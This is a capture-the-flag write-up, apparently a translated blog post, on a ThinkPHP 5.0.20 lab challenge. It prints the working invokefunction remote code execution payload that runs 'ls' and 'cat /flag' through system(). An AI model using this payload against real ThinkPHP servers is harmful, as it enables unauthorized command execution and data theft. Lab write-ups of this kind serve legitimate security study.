当前位置:网站首页>Attack and defense world web master advanced area PHP_ rce
Attack and defense world web master advanced area PHP_ rce
2022-07-29 00:17:00 【Ant200】
Tools
firefox
1. Open the link , Observed that this is a Think PHP V5 frame
2. Try typing index.php, Found that the page did not change , Continue to input the next level file ( Input at will ), Found out the version 5.0.20
3. Query the vulnerability of the relevant version ( Baidu or github) You can try 、
Query to the payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls
Put it in and try to find something you can use
ls It's a system command , We just need to change the system command to open flag Just file
structure payload:?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag
4. The query is successful , find flag.
Relevant boss resources :
Attack and defend the world web Advanced master php_rce, Attack and defend the world web Master advanced area 1-5 2020.6.11_ Hazelnut is on the glowing blog -CSDN Blog
php Command execution exploit ,ThinkPHP 5.0 & 5.1 Remote command execution vulnerability analysis _AI Zhongzhi new media a Rong's blog -CSDN Blog
边栏推荐
- JS高级 之 ES6~ES13 新特性
- Linux之yum安装MySQL
- What do you need to bring with you for the NPDP exam? Stationery carrying instructions
- Install MySQL using Yum for Linux
- [applet project development -- JD mall] uni app commodity classification page (first)
- 【MySQL 8】Generated Invisible Primary Keys(GIPK)
- 110道 MySQL面试题及答案 (持续更新)
- Plato farm is expected to further expand its ecosystem through elephant swap
- Solution: direct local.Aar file dependencies are not supported when building an aar
- 动态规划问题(一)
猜你喜欢
JS advanced ES6 ~ es13 new features
Install MySQL using Yum for Linux
html+css+php+mysql实现注册+登录+修改密码(附完整代码)
MySQL installation and configuration tutorial (super detailed, nanny level)
Real time data warehouse: meituan's implementation of real-time data warehouse construction based on Flink
Web系统常见安全漏洞介绍及解决方案-sql注入
【C】替换空格,宏实现整数的二进制奇偶位交换
ZABBIX 5.0 uses its own redis template for monitoring
IDEA报错Error running ‘Application‘ Command line is too long解决方案
How can Plato obtain premium income through elephant swap in a bear market?
随机推荐
SAP temporary tablespace error handling
Applet editor rich text editing and rich text parsing
Servlet运行原理_API详解_请求响应构造进阶之路(Servlet_2)
【C】替换空格,宏实现整数的二进制奇偶位交换
动态规划问题(七)
Application of Devops in Internet of things solutions
Idea2021.2 installation and configuration (continuous update)
软件设计师的错题汇总
Android studio连接MySQL并完成简单的登录注册功能
Real time data warehouse: Netease strictly selects the practice of real-time data warehouse based on Flink
Web系统常见安全漏洞介绍及解决方案-sql注入
EN 12101-8:2011 smoke dampers for smoke and heat control systems - CE certification
EN 1935 building hardware. Single axis hinge - CE certification
Please briefly describe the respective characteristics of list, set and map type sets (briefly describe three different inheritance methods)
Servlet operation principle_ API details_ Advanced path of request response construction (servlet_2)
1-5 类式组件
Erc20 Standard Code
Okaleido ecological core equity Oka, all in fusion mining mode
“Method Not Allowed“,405问题分析及解决
Sword finger offer 64. find 1+2+... +n, logical operator short circuit effect